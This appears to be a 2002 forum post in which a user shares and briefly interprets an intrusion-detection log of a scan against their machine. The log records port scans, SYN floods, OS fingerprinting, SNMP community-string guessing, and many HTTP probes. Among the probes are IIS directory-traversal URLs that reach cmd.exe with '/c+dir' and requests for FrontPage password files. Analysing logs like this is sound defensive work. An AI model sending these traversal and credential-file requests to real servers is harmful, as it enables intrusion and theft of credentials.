Since the scan included both a port scan,but attempts at various GET requests and directories, even though port 80 was closed. Thus, that rules out anything like code red/nimda/sadmind worm, etc. Seems much more like a scanner checking for known vulnerabilities/brute force method.
below is the log information: timestamp (GMT) issueName parameters victimPort 2002-02-01 18:28:08 TCP port scan port=1-32&reason=Firewalled 32 2002-02-01 18:28:48 TCP port scan port=65-112|114-314|321-544&reason=Firewalled 544 2002-02-01 18:29:26 TCP port scan port=545-570|589-832|857-1023&reason=Firewalled&name=Phase+Zero 1023 2002-02-01 18:29:28 TCP port scan port=1020-1023|1025|1027-1031|1033-1038|1040-1043|1045|1047-1053|1057-1058 0 2002-02-01 18:29:30 SOCKS port probe port=1080&reason=RSTsent 1080 2002-02-01 18:29:31 TCP port scan port=1028|1033|1035|1037-1038|1040|1043|1046-1048|1050-1051|1054|1056-1058|1 060-1065|1067-1070|1074-1081|1084-1087|1089-1095|1098-1111|1114-1116 0 2002-02-01 18:29:34 TCP port scan port=1114-1115|1146-1147|1149-1153|1157-1160 0 2002-02-01 18:29:37 TCP port scan port=1147-1148|1151|1153-1156|1158-1187|1189-1195|1197-1203|1205|1207-1218|1 220-1227|1231 0 2002-02-01 18:29:39 SubSeven port probe port=1243&name=Sub_7&reason=RSTsent 1243 2002-02-01 18:29:41 TCP port scan port=1207|1210|1212|1214-1216|1219|1221|1226-1255|1257-1260|1262-1271|1273-1 278|1280-1289|1291-1299|1302-1303|1307-1310 0 2002-02-01 18:29:44 TCP port scan port=1288-1290|1293-1299|1302-1307|1309-1310|1312-1317|1319-1337|1339-1344|1 346-1349|1351-1365|1367-1369|1373-1376|1380-1383 0 2002-02-01 18:29:46 SQL port probe port=1433&reason=RSTsent 1433 2002-02-01 18:29:47 TCP port scan port=1363-1371|1373-1377|1379-1392|1394-1398|1400-1411|1413-1425|1427-1432|1 434-1438|1440-1450|1454-1455 0 2002-02-01 18:29:47 SQL port probe port=1433&reason=RSTsent 1433 2002-02-01 18:29:50 TCP port scan port=1434-1435|1437-1438|1441-1442|1445-1446|1448-1451|1453-1460|1462-1464|1 467-1480|1482-1487|1489-1494|1496-1498|1502-1507|1509-1512|1514|1516-1520|15 24-1527 0 2002-02-01 18:29:52 TCP port scan port=1499-1500|1507-1508|1514-1518|1520-1526|1529|1531-1534|1536-1541|1545|1 548-1560 0 2002-02-01 18:29:56 TCP port scan port=1589-1592|1595-1619|1621-1626|1628-1632|1634-1637|1639-1640 0 2002-02-01 18:29:59 TCP port scan port=1615|1618-1625|1629-1633|1637-1659|1661-1688|1690-1693|1695-1696|1698-1 703|1706|1710-1713|1716-1717 0 2002-02-01 18:30:00 PPTP port probe port=1723&reason=RSTsent 1723 2002-02-01 18:30:02 TCP port scan port=1691-1692|1694-1695|1699-1700|1702-1703|1705-1709|1713-1718|1720-1748|1 750-1770|1772-1777|1780-1782|1786-1788 0 2002-02-01 18:30:05 TCP port scan port=1768-1775|1778-1783|1786-1791|1793-1799|1801-1836|1838-1847|1849-1851|1 855-1858 0 2002-02-01 18:30:08 TCP port scan port=1835-1836|1839-1841|1843-1844|1847-1848|1850-1855|1857-1863|1865-1868|1 870-1896|1898-1907|1909-1913|1915|1917-1918|1920-1923|1927-1929 0 2002-02-01 18:30:11 TCP port scan port=1906|1913-1914|1920-1926|1928-1937|1939-1942|1944-1968|1970-1976|1978-1 982|1986-1989|1993-1999|2003-2006 0 2002-02-01 18:30:17 TCP port scan port=1991|1995|1997-1999|2004|2006-2007|2010-2011|2031-2044|2046-2053|2055-2 070|2072-2075|2077-2080|2083-2097|2101-2104|2108-2111 0 2002-02-01 18:30:20 TCP port scan port=2082|2090|2092-2093|2096-2147|2151-2154|2156-2157 0 2002-02-01 18:30:23 TCP port scan port=2143|2156-2158|2160|2164-2176|2178|2180-2196|2198|2200-2206|2208-2212|2 214-2217|2219|2221-2224|2227-2230 0 2002-02-01 18:30:26 TCP port scan port=2209-2210|2214-2218|2220-2228|2230|2232|2234|2236-2248|2250-2258|2261-2 268|2271-2277|2279-2280|2283-2286|2288|2290-2292 0 2002-02-01 18:30:30 TCP port scan port=2280-2283|2288-2312|2314-2325|2327-2349|2351-2355|2359-2360|2364-2367 0 2002-02-01 18:30:33 TCP port scan port=2348|2350-2351|2354|2357-2359|2361-2368|2371-2390|2392-2402|2405-2416|2 418-2420|2422-2424|2428-2430|2434-2437|2441-2442 0 2002-02-01 18:30:35 TCP port scan port=2412|2415-2416|2420-2421|2423-2426|2428|2431-2438|2440|2444-2453|2465-2 468|2473-2477|2479-2482 0 2002-02-01 18:30:38 TCP port scan port=2468-2471|2474-2529|2531-2534|2536|2538-2541|2544-2545|2547-2548 0 2002-02-01 18:30:42 TCP port scan port=1029|2524-2527|2529-2530|2532|2535|2538|2540|2542-2547|2551-2570|2572-2 576|2578-2583|2585-2609|2611-2615|2619-2622|2626-2629 0 2002-02-01 18:30:45 TCP port scan port=2611|2613-2615|2618-2619|2621-2623|2626-2631|2633-2650|2652-2663|2665|2 667-2678|2680-2683|2687-2690|2694-2697|2701-2704 0 2002-02-01 18:30:45 TCP port probe port=1024-1025|1027-1028|1030-1060|1062-1066|1068-1079|1081|1083-1087|1089-1 116|1146-1242|1244-1432|1434-1542|1544-1560|1589-1719|1721-1722|1724-2011|20 31-2160|2164-2286|2288-2455|2465-2705&reason=RSTsent 2681 2002-02-01 18:30:45 TCP port probe port=2674-2714&reason=RSTsent 2697 2002-02-01 18:30:46 TCP SYN flood PercentFromIntruder=55&SYNs=119&DATAs=0 0 2002-02-01 18:33:13 TCP port scan port=2674|2676-2679|2681-2685|2687-2691|2693|2695-2719|2721-2736|2738-2743|2 745-2756|2759-2783|2786-2806|2809-2820|2822-2828|2830-2874|2877-2880|2883-28 87|2889-2892|2902-2916|2918-2946|2948-2958|2961-2965|2967-2970|2972-2979|298 1-2982|2984-2986|2988 0 2002-02-01 18:34:49 TCP SYN flood PercentFromIntruder=64&SYNs=124&DATAs=1 0 2002-02-01 18:34:55 TCP SYN flood PercentFromIntruder=56&SYNs=104&DATAs=1 0 2002-02-01 18:34:56 TCP SYN flood PercentFromIntruder=66&SYNs=111&DATAs=0 0 2002-02-01 18:35:06 TCP SYN flood PercentFromIntruder=68&SYNs=117&DATAs=0 0 2002-02-01 18:35:07 TCP SYN flood PercentFromIntruder=55&SYNs=129&DATAs=4 0 2002-02-01 18:35:10 TCP SYN flood PercentFromIntruder=62&SYNs=143&DATAs=4 0 2002-02-01 18:35:16 TCP SYN flood PercentFromIntruder=63&SYNs=129&DATAs=1 0 2002-02-01 18:35:17 TCP SYN flood PercentFromIntruder=55&SYNs=103&DATAs=0 0 2002-02-01 18:35:19 TCP port scan port=5898-5921|5923|5926-5930|5932-5959|5962-5978|5980-5984|5986-5992|5994-5 999|6001-6006|6008-6013|6015-6032|6034-6047|6049-6077|6079-6088|6090|6092-61 14|6116-6136|6138-6144|6146-6163|6165-6170|6173-6178|6181-6185|6188-6203|620 5-6231|6234-6258|6262 0 2002-02-01 18:35:30 TCP SYN flood PercentFromIntruder=56&SYNs=112&DATAs=0 0 2002-02-01 18:35:37 TCP SYN flood PercentFromIntruder=61&SYNs=128&DATAs=0 0 2002-02-01 18:35:38 TCP SYN flood PercentFromIntruder=57&SYNs=126&DATAs=0 0 2002-02-01 18:35:48 TCP SYN flood PercentFromIntruder=53|58&SYNs=119|135&DATAs=0|2 0 2002-02-01 18:35:52 TCP SYN flood PercentFromIntruder=65&SYNs=118&DATAs=0 0 2002-02-01 18:35:58 TCP SYN flood PercentFromIntruder=57&SYNs=133&DATAs=1 0 2002-02-01 18:36:53 TCP port scan port=6710-6711|6718|6722-6723|6726|6761-6771|6775-6810|6812-6835|6837-6854|6 856-6872|6875-6883|6885-6892|6894-6911|6913-6937|6939-6992|6994-7000|7002-70 29|7031-7040|7042-7053|7055-7077|7079-7106|7108-7118|7120-7125|7129-7134|713 6-7149|7153-7155|7157 0 2002-02-01 18:38:20 TCP port scan port=1~223|242~248|256~264|280~282|308~321|344~600|606~611|628|633~640|650|6 66|704|709|729~731|737~786|799~801|871|888|911|989~1001|1008~1015|1023|merge range(4)&reason=Firewalled|mergerange(4)&name=Phase+Zero|mergerange(4) 1023 2002-02-01 18:38:34 TCP port scan port=1024-1026|1030|1045|1058-1059|1067|1084|1090|1103|1127|1155|1167|1170|1 234|1241|1243|1245|1347-1350|1354-1357|1361-1364|1368-1371|1375-1378|1382-13 85|1389-1392|1396-1399|1403-1406|1410-1413|1417-1420|1424-1427|1430-1433|143 7-1440|1544-1547|1552 0 2002-02-01 18:38:52 TCP port scan port=1-3|5|7|9|11|13|15|17-25|27|29|31|33|35|37-39|41-223|242-248|256-264|28 0-282|308-317|321|344-444|446-448|464-533|65301&reason=Firewalled 533 2002-02-01 18:38:55 TCP port scan port=534-563&reason=Firewalled&name=Phase+Zero 563 2002-02-01 18:39:07 TCP port scan port=564-600|606-611|628|633-636|640|650|666|704|709|729-731|737|740-742|744 |747-754|758-765|767|769-775|993|995-1001|1008|1010-1012|1015|1023&reason=Fi rewalled 1023 2002-02-01 18:39:14 TCP SYN flood PercentFromIntruder=59|62&SYNs=110-111&DATAs=0 0 2002-02-01 18:39:15 TCP port scan port=1446-1449|1453-1456|1460-1463|1467-1470|1474-1477|1481-1484|1488-1491|1 495-1498|1502-1505|1509-1512|1516-1519|1523-1526|1530-1533|1537-1540|1647-16 50|1654-1657|1661-1664|1668-1671|1675-1677|1723|1827|1981|1986-1987|1991-199 4|1998-2001|2005-2008 0 2002-02-01 18:39:23 TCP port scan port=1~223|242~248|256~264|280~282|308~317|321|344~600|606~611|628|633~636|6 40|650|666|704|709|729~731|737|740~744|747~754|758~776|780~783|786|799~801|8 71|mergerange(2)&reason=Firewalled|mergerange(2)&name=Phase+Zero|mergerange( 2) 871 2002-02-01 18:39:24 TCP SYN flood PercentFromIntruder=63&SYNs=134&DATAs=2 0 2002-02-01 18:39:33 TCP port scan port=1~223|242~248|256~264|280~282|308~321|344~600|606~611|628|633~640|650|6 66|704|709|729~731|737~786|799~801|871|888|911|989~997|7007|mergerange(4)&re ason=Firewalled|mergerange(4)&name=Phase+Zero|mergerange(4) 997 2002-02-01 18:39:34 TCP SYN flood PercentFromIntruder=60&SYNs=138&DATAs=7 0 2002-02-01 18:39:40 NMAP OS fingerprint port=1024|1026&flags=S&options=wscale:10;maxseg:265;time:1061109567-0 1024 2002-02-01 18:39:40 TCP ACK ping port=1024|1026&flags=A&options=wscale:10;maxseg:265;time:1061109567-0 1024 2002-02-01 18:39:41 TCP OS fingerprint port=1024|1026&flags=FPU|SFPU&options=wscale:10;maxseg:265;time:1061109567-0 1024 2002-02-01 18:39:44 TCP OS fingerprint port=1024|1026&flags=FPU|SFPU&options=wscale:10;maxseg:265;time:1061109567-0 1024 2002-02-01 18:39:45 TCP OS fingerprint port=1024|1026&flags=FPU|SFPU&options=wscale:10;maxseg:265;time:1061109567-0 1024 2002-02-01 18:39:45 UDP port probe port=1024&reason=ICMPsent 1024 2002-02-01 18:40:03 NMAP OS fingerprint port=1024|1026&flags=S&options=wscale:10;maxseg:265;time:1061109567-0 1024 2002-02-01 18:40:03 TCP ACK ping port=1024|1026&flags=A&options=wscale:10;maxseg:265;time:1061109567-0 1024 2002-02-01 18:40:05 TCP OS fingerprint port=1024|1026&flags=FPU|SFPU&options=wscale:10;maxseg:265;time:1061109567-0 1024 2002-02-01 18:40:08 TCP OS fingerprint port=1024|1026&flags=FPU|SFPU&options=wscale:10;maxseg:265;time:1061109567-0 1024 2002-02-01 18:40:09 TCP OS fingerprint port=1024|1026&flags=FPU|SFPU&options=wscale:10;maxseg:265;time:1061109567-0 1024 2002-02-01 18:40:09 UDP port probe port=1024&reason=ICMPsent 1024 2002-02-01 18:40:30 NMAP OS fingerprint port=1024|1026&flags=S&options=wscale:10;maxseg:265;time:1061109567-0 1024 2002-02-01 18:40:30 TCP ACK ping port=1024|1026&flags=A&options=wscale:10;maxseg:265;time:1061109567-0 1024 2002-02-01 18:40:30 TCP OS fingerprint port=1024|1026&flags=FPU|SFPU&options=wscale:10;maxseg:265;time:1061109567-0 1024 2002-02-01 18:40:32 TCP OS fingerprint port=1024|1026&flags=FPU|SFPU&options=wscale:10;maxseg:265;time:1061109567-0 1024 2002-02-01 18:40:32 UDP port probe port=1024&reason=ICMPsent 1024 2002-02-01 18:40:46 NMAP OS fingerprint port=1026&flags=S&options=wscale:10;maxseg:265;time:1061109567-0 1026 2002-02-01 18:40:51 HTTP URL with +.htr appended URL=/default.asp+.htr|/iisstart.asp+.htr&arg=&accessed=no&code=404 5800 2002-02-01 18:40:51 HTTP URL with +.htr appended URL=/iisstart.asp+.htr&accessed=no&code=404 5800 2002-02-01 18:40:51 HTTP URL scan count=4&URL=/cgi-bin/htimage.exe|/default.asp+.htr|/default.asp\|/iisstart.a sp+.htr|/iisstart.asp\|/localstart.asp\|/main.asp\|/rettest.ida 5800 2002-02-01 18:40:51 HTTP asp with \ appended URL=/default.asp\|/iisstart.asp\|/localstart.asp\|/main.asp\&arg=&accessed=n o&code=404 5800 2002-02-01 18:40:51 HTTP asp with \ appended URL=/iisstart.asp\|/localstart.asp\|/main.asp\&accessed=no&code=404 5800 2002-02-01 18:40:51 IIS .printer overflow length=257&URL=/null.printer&accessed=no&code=404 5800 2002-02-01 18:40:52 HTTP URL with +.htr appended URL=/localstart.asp+.htr&arg=&accessed=no&code=404 5800 2002-02-01 18:40:52 HTTP URL with +.htr appended URL=/global.asa+.htr|/index.asp+.htr|/main.asp+.htr|/start.asp+.htr&arg=&acc essed=no&code=404 5800 2002-02-01 18:40:52 HTTP URL with +.htr appended URL=/global.asa+.htr|/index.asp+.htr|/start.asp+.htr&accessed=no&code=404 5800 2002-02-01 18:40:52 HTTP asp with \ appended URL=/index.asp\|/start.asp\&arg=&accessed=no&code=404 5800 2002-02-01 18:40:52 IIS system32 command URL=/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe&arg=/c+dir &accessed=no&code=404 5800 2002-02-01 18:40:52 HTTP asp with \ appended URL=/index.asp\&accessed=no&code=404 5800 2002-02-01 18:40:52 IIS system32 command URL=/IISADMPWD/...%259v..%25c.%259v..%25c.%259v..%25c.%259v..%25c.%259v..%25 c.%259v..%25c.%259v..%25c.%259v/winnt/system32/cmd.exe|/cgi-bin/...%259v..%2 5c.%259v..%25c.%259v..%25c.%259v..%25c.%259v..%25c.%259v..%25c.%259v..%25c.% 259v/winnt/system32/cmd.exe| 5800 2002-02-01 18:40:53 bat URL type URL=/cgi-dos/args.bat&arg=&accessed=no&code=404 5800 2002-02-01 18:40:53 HTTP UTF8 backtick URL=/IISADMPWD/../../../../../../../..//winnt/system32/cmd.exe|/cgi-bin/../. ./../../../../../..//winnt/system32/cmd.exe|/msadc/../../../../../../../..// winnt/system32/cmd.exe|/scripts/../../../../../../../..//winnt/system32/cmd. exe 5800 2002-02-01 18:40:53 IIS system32 command URL=/IISADMPWD/../../../../../../../..//winnt/system32/cmd.exe|/cgi-bin/../. ./../../../../../..//winnt/system32/cmd.exe|/msadc/../../../../../../../..// winnt/system32/cmd.exe|/scripts/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/wi nnt/system32/cmd.exe| 5800 2002-02-01 18:40:54 CGI campas URL=/cgi-bin/campas&arg=&accessed=no&code=404 5800 2002-02-01 18:40:54 IIS system32 command URL=/IISADMPWD/...%25qf..%25c.%25qf..%25c.%25qf..%25c.%25qf..%25c.%25qf..%25 c.%25qf..%25c.%25qf..%25c.%25qf/winnt/system32/cmd.exe|/cgi-bin/...%25qf..%2 5c.%25qf..%25c.%25qf..%25c.%25qf..%25c.%25qf..%25c.%25qf..%25c.%25qf..%25c.% 25qf/winnt/system32/cmd.exe| 5800 2002-02-01 18:40:54 Cold Fusion sample URL URL=/cfdocs/expeval/exprcalc.cfm&arg=&accessed=no&code=404 5800 2002-02-01 18:40:55 HTTP URL scan count=4&URL=/IISADMPWD/..%255c../..%255c../..%255c../winnt/system32/cmd.exe| /IISADMPWD/...%258s..%25c.%258s..%25c.%258s..%25c.%258s..%25c.%258s..%25c.%2 58s..%25c.%258s..%25c.%258s/winnt/system32/cmd.exe| 5800 2002-02-01 18:40:55 IIS system32 command URL=/IISADMPWD/..%255c../..%255c../..%255c../winnt/system32/cmd.exe|/IISADMP WD/...%258s..%25c.%258s..%25c.%258s..%25c.%258s..%25c.%258s..%25c.%258s..%25 c.%258s..%25c.%258s/winnt/system32/cmd.exe|/cgi-bin/...%258s..%25c.%258s..%2 5c.%258s..%25c.%258s..%25c.%258s..%25c.%258s..%25c.%258s..%25c.%258s/winnt/s ystem32/cmd.exe 5800 2002-02-01 18:40:55 Cold Fusion sample URL URL=/cfdocs/expeval/sendmail.cfm&arg=&accessed=no&code=404 5800 2002-02-01 18:40:55 IIS system32 command URL=/IISADMPWD/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd. exe|/IISADMPWD/..\..\..\..\..\..\..\..\/winnt/system32/cmd.exe|/_vti_bin/../ ../../../../../../..//winnt/system32/cmd.exe|/cgi-bin/..\..\..\..\..\..\..\. .\/winnt/system32/cmd.exe| 5800 2002-02-01 18:40:56 IIS system32 command URL=/IISADMPWD/%252e%252e%252f%252e%252e/%252e%252e%252f%252e%252e/%252e%252 e%252f%252e%252e/winnt/system32/cmd.exe|/IISADMPWD/...%25pc..%25c.%25pc..%25 c.%25pc..%25c.%25pc..%25c.%25pc..%25c.%25pc..%25c.%25pc..%25c.%25pc/winnt/sy stem32/cmd.exe| 5800 2002-02-01 18:40:56 SNMP backdoor community=all_private|community|default|network|openview|password|private|se cret|tivoli&product=Sun 161 2002-02-01 18:40:56 SNMP Crack community=admin|worldread 161 2002-02-01 18:40:56 SNMP port probe port=161&reason=Firewalled 161 2002-02-01 18:40:57 CGI htmlscript URL=/cgi-bin/htmlscript&arg=&accessed=no&code=404 5800 2002-02-01 18:40:57 HTTP UTF8 backtick URL=/IISADMPWD/..\..\..\..\..\..\..\..\/winnt/system32/cmd.exe|/_vti_bin/../ ../../../../../../..//winnt/system32/cmd.exe|/_vti_bin/..\..\..\..\..\..\..\ ..\/winnt/system32/cmd.exe|/cgi-bin/..\..\..\..\..\..\..\..\/winnt/system32/ cmd.exe| 5800 2002-02-01 18:40:57 HTTP URL scan count=4&URL=/IISADMPWD/%252e%252e%252f%252e%252e/%252e%252e%252f%252e%252e/% 252e%252e%252f%252e%252e/winnt/system32/cmd.exe|/IISADMPWD/.%252e/.%252e/.%2 52e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe| 5800 2002-02-01 18:40:57 IIS system32 command URL=/_vti_bin/...%258s..%25c.%258s..%25c.%258s..%25c.%258s..%25c.%258s..%25c .%258s..%25c.%258s..%25c.%258s/winnt/system32/cmd.exe|/_vti_bin/..\..\..\..\ ..\..\..\..\/winnt/system32/cmd.exe|/msadc/.%252e/.%252e/.%252e/.%252e/.%252 e/.%252e/winnt/system32/cmd.exe| 5800 2002-02-01 18:40:57 IIS system32 command URL=/IISADMPWD/%252e%252e%252f%252e%252e/%252e%252e%252f%252e%252e/%252e%252 e%252f%252e%252e/winnt/system32/cmd.exe|/IISADMPWD/.%252e/.%252e/.%252e/.%25 2e/.%252e/.%252e/winnt/system32/cmd.exe|/IISADMPWD/..%255c../..%255c../..%25 5c../winnt/system32/cmd.exe| 5800 2002-02-01 18:40:57 CGI mlog.html URL=/mlog.html&arg=&accessed=no&code=404 5800 2002-02-01 18:40:58 CGI mylog.html URL=/mylog.html&arg=&accessed=no&code=404 5800 2002-02-01 18:40:58 IIS system32 command URL=/_vti_bin/...%25pc..%25c.%25pc..%25c.%25pc..%25c.%25pc..%25c.%25pc..%25c .%25pc..%25c.%25pc..%25c.%25pc/winnt/system32/cmd.exe&arg=/c_dir&accessed=no &code=404 5800 2002-02-01 18:40:58 IIS system32 command URL=/msadc/%252e%252e%252f%252e%252e/%252e%252e%252f%252e%252e/%252e%252e%25 2f%252e%252e/winnt/system32/cmd.exe&arg=/c+dir&accessed=no&code=404 5800 2002-02-01 18:40:58 CGI nph-test-cgi URL=/cgi-bin/nph-test-cgi&arg=&accessed=no&code=404 5800 2002-02-01 18:40:58 CGI phf URL=/cgi-bin/phf&arg=&accessed=no&code=404 5800 2002-02-01 18:40:58 HTTP cgi starting with php URL=/cgi-bin/php.cgi&arg=&accessed=no&code=404 5800 2002-02-01 18:40:58 IIS system32 command URL=/cgi-bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe&arg=/c+dir &accessed=no&code=404 5800 2002-02-01 18:40:59 CGI test-cgi URL=/cgi-bin/test-cgi&arg=&accessed=no&code=404 5800 2002-02-01 18:40:59 CGI view-source URL=/cgi-bin/view-source&arg=&accessed=no&code=404 5800 2002-02-01 18:40:59 IIS system32 command URL=/cgi-bin/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.ex e&arg=/c+dir&accessed=no&code=404 5800 2002-02-01 18:40:59 CGI webdist.cgi URL=/cgi-bin/webdist.cgi&arg=&accessed=no&code=404 5800 2002-02-01 18:40:59 CGI websendmail URL=/cgi-bin/websendmail&arg=&accessed=no&code=404 5800 2002-02-01 18:40:59 CGI webgais URL=/cgi-bin/webgais&arg=&accessed=no&code=404 5800 2002-02-01 18:41:00 IIS system32 command URL=/cgi-bin/%252e%252e%252f%252e%252e/%252e%252e%252f%252e%252e/%252e%252e% 252f%252e%252e/winnt/system32/cmd.exe&arg=/c+dir&accessed=no&code=404 5800 2002-02-01 18:41:00 Site Server sample URL URL=/adsamples/config/site.csc&arg=&accessed=no&code=404 5800 2002-02-01 18:41:01 IIS system32 command URL=/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe&arg=/c+di r&accessed=no&code=404 5800 2002-02-01 18:41:01 CGI newdsn.exe URL=/scripts/tools/newdsn.exe&arg=&accessed=no&code=404 5800 2002-02-01 18:41:01 IIS system32 command URL=/_vti_bin/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.e xe&arg=/c+dir&accessed=no&code=404 5800 2002-02-01 18:41:01 CGI win-c-sample.exe URL=/cgi-shl/win-c-sample.exe&arg=&accessed=no&code=404 5800 2002-02-01 18:41:02 IIS system32 command URL=/_vti_bin/%252e%252e%252f%252e%252e/%252e%252e%252f%252e%252e/%252e%252e %252f%252e%252e/winnt/system32/cmd.exe&arg=/c+dir&accessed=no&code=404 5800 2002-02-01 18:41:03 CGI rguest.exe URL=/cgi-bin/rguest.exe&arg=&accessed=no&code=404 5800 2002-02-01 18:41:03 HTTP URL scan count=4&URL=/ROADS/cgi-bin/search.pl|/_vti_bin/%252e%252e%252f%252e%252e/%25 2e%252e%252f%252e%252e/%252e%252e%252f%252e%252e/winnt/system32/cmd.exe|/_vt i_bin/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe|/_vti _bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe| 5800 2002-02-01 18:41:03 CGI wguest.exe URL=/cgi-bin/wguest.exe&arg=&accessed=no&code=404 5800 2002-02-01 18:41:03 Shopping cart order URL URL=/mall_log_files/order.log&arg=&accessed=no&code=404 5800 2002-02-01 18:41:03 Shopping cart order URL URL=PDG_Cart/order.log&arg=&accessed=no&code=404 5800 2002-02-01 18:41:04 WebStore admin URL URL=/Admin_files/order.log&arg=&accessed=no&code=404 5800 2002-02-01 18:41:05 Cold Fusion sample URL URL=/cfdocs/expeval/displayopenedfile.cfm&arg=&accessed=no&code=404 5800 2002-02-01 18:41:05 Cold Fusion sample URL URL=/cfdocs/expeval/exprcalc.cfm&arg=&accessed=no&code=404 5800 2002-02-01 18:41:05 Cold Fusion sample URL URL=/cfdocs/expeval/openfile.cfm&arg=&accessed=no&code=404 5800 2002-02-01 18:41:05 HTTP URL scan count=4&URL=/Admin_files/order.log|/_vti_pvt/authors.pwd|/cfdocs/expeval/dis playopenedfile.cfm|/cfdocs/expeval/exprcalc.cfm|/cfdocs/expeval/openfile.cfm |/cgi-bin/bash|/cgi-bin/perl|/cgi-bin/rksh|/cgi-bin/sh|/cgi-bin/tcsh|/mall_l og_files/order.log| 5800 2002-02-01 18:41:05 FrontPage service.pwd URL=/_vti_pvt/service.pwd&arg=&accessed=no&code=404 5800 2002-02-01 18:41:06 IIS sample URL URL=/msadc/Samples/SELECTOR/showcode.asp&arg=&accessed=no&code=404 5800 2002-02-01 18:41:24 TCP port scan port=80|1024|1026|5800|5900&reason=Firewalled 80 2002-02-01 18:41:27 HTTP port probe port=80&reason=Firewalled 80 2002-02-01 18:41:33 HTTP port probe port=80&reason=Firewalled 80 2002-02-01 18:41:48 HTTP port probe port=80&reason=Firewalled 80
